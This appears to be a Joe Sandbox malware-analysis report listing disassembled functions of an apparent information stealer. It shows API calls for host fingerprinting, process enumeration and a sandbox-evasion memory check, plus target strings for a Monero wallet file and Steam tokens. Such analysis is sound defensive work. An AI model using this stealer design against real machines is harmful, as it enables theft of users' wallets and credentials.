Opcode ID: 602fa9a8ff0681271d88d48d150b4f8ce04496435b92b45be94b41b439adebbc
Instruction ID: 82aba2c372e41d398ea2aafd442e86dadc9d27e20483407caaeea72eb29764ca
Opcode Fuzzy Hash: 602fa9a8ff0681271d88d48d150b4f8ce04496435b92b45be94b41b439adebbc
Instruction Fuzzy Hash: C50181B1A15209EBD700DF99DD45BAABBF8FB04B25F10426AFA45E3280C37459548BA1

Function 6C5B3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C5B3095

Part of subcall function 6C5B35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C63F688,00001000), ref: 6C5B35D5
Part of subcall function 6C5B35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5B35E0
Part of subcall function 6C5B35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C5B35FD
Part of subcall function 6C5B35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5B363F
Part of subcall function 6C5B35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5B369F
Part of subcall function 6C5B35A0: __aulldiv.LIBCMT ref: 6C5B36E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C5B309F

Part of subcall function 6C5D5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C5D56EE,?,00000001), ref: 6C5D5B85
Part of subcall function 6C5D5B50: EnterCriticalSection.KERNEL32(6C63F688,?,?,?,6C5D56EE,?,00000001), ref: 6C5D5B90
Part of subcall function 6C5D5B50: LeaveCriticalSection.KERNEL32(6C63F688,?,?,?,6C5D56EE,?,00000001), ref: 6C5D5BD8
Part of subcall function 6C5D5B50: GetTickCount64.KERNEL32 ref: 6C5D5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C5B30BE

Part of subcall function 6C5B30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C5B3127
Part of subcall function 6C5B30F0: __aulldiv.LIBCMT ref: 6C5B3140

Part of subcall function 6C5EAB2A: __onexit.LIBCMT ref: 6C5EAB30

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: 3bfe3024dc6a8a1cfaf36b2976093372c871021e7d8d78550dde63a21e884509
Instruction ID: 4e3fea9220752a3903177307d792f274487d956a1b0e6bdd39f6bbb95ef4149d
Opcode Fuzzy Hash: 3bfe3024dc6a8a1cfaf36b2976093372c871021e7d8d78550dde63a21e884509
Instruction Fuzzy Hash: 85F0D662E20B4897CB20EF358D911A67774AFAB115F50331AE84C63561FB3065D8839A

Function 00269470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 00269484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 002694A5
CloseHandle.KERNEL32(00000000), ref: 002694AF

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
Opcode ID: e790352e5d91002bcb6cc461614c44f38877631f26179209befb94cfb6d7e6d3
Instruction ID: dbfba37f914fa006a1f31a49245f57b7e4fe9170788ba2ac094fa3123dca6eef
Opcode Fuzzy Hash: e790352e5d91002bcb6cc461614c44f38877631f26179209befb94cfb6d7e6d3
Instruction Fuzzy Hash: 01F05E7490020CFBDB05EFA4DC4AFED7778EB08304F0044A8BA0997290DAB0AED5CB95

Function 00251110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0025112B
VirtualAllocExNuma.KERNEL32(00000000), ref: 00251132
ExitProcess.KERNEL32 ref: 00251143

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: df7ec5a0c07f9d0d4b48a76aee87313c62fb58132d86950c0200f782f00dae3b
Instruction ID: b27ae4fa034f6d7ae27822eb81a33fa0d71d318118acc64314c51644415226bc
Opcode Fuzzy Hash: df7ec5a0c07f9d0d4b48a76aee87313c62fb58132d86950c0200f782f00dae3b
Instruction Fuzzy Hash: 2BE0E670995308FBE710ABA09C0FB097678AB14B02F1040A5FB09761D0D6B566649ADD

Function 00261A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 00267500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00267542
Part of subcall function 00267500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0026757F
Part of subcall function 00267500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267603
Part of subcall function 00267500: RtlAllocateHeap.NTDLL(00000000), ref: 0026760A

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 00267690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002676A4
Part of subcall function 00267690: RtlAllocateHeap.NTDLL(00000000), ref: 002676AB

Part of subcall function 002677C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,0026DBC0,000000FF,?,00261C99,00000000,?,00D4D640,00000000,?), ref: 002677F2
Part of subcall function 002677C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,0026DBC0,000000FF,?,00261C99,00000000,?,00D4D640,00000000,?), ref: 002677F9

Part of subcall function 00267850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002511B7), ref: 00267880
Part of subcall function 00267850: RtlAllocateHeap.NTDLL(00000000), ref: 00267887
Part of subcall function 00267850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0026789F

Part of subcall function 002678E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267910
Part of subcall function 002678E0: RtlAllocateHeap.NTDLL(00000000), ref: 00267917
Part of subcall function 002678E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0026792F

Part of subcall function 00267980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00270E00,00000000,?), ref: 002679B0
Part of subcall function 00267980: RtlAllocateHeap.NTDLL(00000000), ref: 002679B7
Part of subcall function 00267980: GetLocalTime.KERNEL32(?,?,?,?,?,00270E00,00000000,?), ref: 002679C4
Part of subcall function 00267980: wsprintfA.USER32 ref: 002679F3

Part of subcall function 00267A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00D4E230,00000000,?,00270E10,00000000,?,00000000,00000000), ref: 00267A63
Part of subcall function 00267A30: RtlAllocateHeap.NTDLL(00000000), ref: 00267A6A
Part of subcall function 00267A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00D4E230,00000000,?,00270E10,00000000,?,00000000,00000000,?), ref: 00267A7D

Part of subcall function 00267B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,00D4E230,00000000,?,00270E10,00000000,?,00000000,00000000), ref: 00267B35

Part of subcall function 00267B90: GetKeyboardLayoutList.USER32(00000000,00000000,002705AF), ref: 00267BE1
Part of subcall function 00267B90: LocalAlloc.KERNEL32(00000040,?), ref: 00267BF9
Part of subcall function 00267B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 00267C0D
Part of subcall function 00267B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00267C62
Part of subcall function 00267B90: LocalFree.KERNEL32(00000000), ref: 00267D22

Part of subcall function 00267D80: GetSystemPowerStatus.KERNEL32(?), ref: 00267DAD

GetCurrentProcessId.KERNEL32(00000000,?,00D4D8E0,00000000,?,00270E24,00000000,?,00000000,00000000,?,00D4E290,00000000,?,00270E20,00000000), ref: 0026207E

Part of subcall function 00269470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 00269484
Part of subcall function 00269470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 002694A5
Part of subcall function 00269470: CloseHandle.KERNEL32(00000000), ref: 002694AF

Part of subcall function 00267E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267E37
Part of subcall function 00267E00: RtlAllocateHeap.NTDLL(00000000), ref: 00267E3E
Part of subcall function 00267E00: RegOpenKeyExA.KERNEL32(80000002,00D3BFA0,00000000,00020119,?), ref: 00267E5E
Part of subcall function 00267E00: RegQueryValueExA.KERNEL32(?,00D4D7C0,00000000,00000000,000000FF,000000FF), ref: 00267E7F
Part of subcall function 00267E00: RegCloseKey.ADVAPI32(?), ref: 00267E92

Part of subcall function 00267F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 00267FC9
Part of subcall function 00267F60: GetLastError.KERNEL32 ref: 00267FD8

Part of subcall function 00267ED0: GetSystemInfo.KERNEL32(00270E2C), ref: 00267F00
Part of subcall function 00267ED0: wsprintfA.USER32 ref: 00267F16

Part of subcall function 00268100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D4E3B0,00000000,?,00270E2C,00000000,?,00000000), ref: 00268130
Part of subcall function 00268100: RtlAllocateHeap.NTDLL(00000000), ref: 00268137
Part of subcall function 00268100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00268158
Part of subcall function 00268100: __aulldiv.LIBCMT ref: 00268172
Part of subcall function 00268100: __aulldiv.LIBCMT ref: 00268180
Part of subcall function 00268100: wsprintfA.USER32 ref: 002681AC

Part of subcall function 002687C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00270E28,00000000,?), ref: 0026882F
Part of subcall function 002687C0: RtlAllocateHeap.NTDLL(00000000), ref: 00268836
Part of subcall function 002687C0: wsprintfA.USER32 ref: 00268850

Part of subcall function 00268320: RegOpenKeyExA.KERNEL32(00000000,00D4B748,00000000,00020019,00000000,002705B6), ref: 002683A4

Part of subcall function 00268320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00268426
Part of subcall function 00268320: wsprintfA.USER32 ref: 00268459
Part of subcall function 00268320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0026847B
Part of subcall function 00268320: RegCloseKey.ADVAPI32(00000000), ref: 0026848C
Part of subcall function 00268320: RegCloseKey.ADVAPI32(00000000), ref: 00268499

Part of subcall function 00268680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,002705B7), ref: 002686CA
Part of subcall function 00268680: Process32First.KERNEL32(?,00000128), ref: 002686DE
Part of subcall function 00268680: Process32Next.KERNEL32(?,00000128), ref: 002686F3
Part of subcall function 00268680: CloseHandle.KERNEL32(?), ref: 00268761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0026265B

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUser__aulldivlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 3113730047-0
Opcode ID: b079ca2c387dd0f11c697fb142b86bfcf511398e718c5a77beb1b852d78cb55f
Instruction ID: 5c547fec90872637aef802e17be0450ce6ce0b4cdedb47fe88d3640ce8b449e0
Opcode Fuzzy Hash: b079ca2c387dd0f11c697fb142b86bfcf511398e718c5a77beb1b852d78cb55f
Instruction Fuzzy Hash: 1A721D72C21158AADB19FB90DD92DEE733CAF54300F6082A9B51773051EF702BA9CE65

Function 00256D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a151d70400036b7cf94cfa9abe1380f222ece0fac22cf1487b5b6119df9526
Instruction ID: 610579de118aca0c3ddb9d174c5cf701fe6f1af7e49c471b4d7256da8a16fed6
Opcode Fuzzy Hash: c0a151d70400036b7cf94cfa9abe1380f222ece0fac22cf1487b5b6119df9526
Instruction Fuzzy Hash: 44614BB4D20209DFCB14CF94E948BEEB7B0BB04305F508598E81A67280D775AFA8DF95

Function 00265100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A820: lstrlen.KERNEL32(00254F05,?,?,00254F05,00270DDE), ref: 0026A82B
Part of subcall function 0026A820: lstrcpy.KERNEL32(00270DDE,00000000), ref: 0026A885

lstrlen.KERNEL32(00000000,00000000,00270ACA), ref: 0026512A

Strings

steam_tokens.txt, xrefs: 0026513F

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 9fbaad6172f63159fd5cc33aca3ab6cb68239050da5369bb7b05bc7d14f79c5c
Instruction ID: e5ceb0696b8c2fa5a931c361b3e20384f9dd9c05f9d647cc62557ba0f2be9ebd
Opcode Fuzzy Hash: 9fbaad6172f63159fd5cc33aca3ab6cb68239050da5369bb7b05bc7d14f79c5c
Instruction Fuzzy Hash: 22F0CD71D3010866DB04FBB4EC579ED773C9F55300F404269B85662492EF346A79CEA7

Function 00267ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00270E2C), ref: 00267F00
wsprintfA.USER32 ref: 00267F16

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
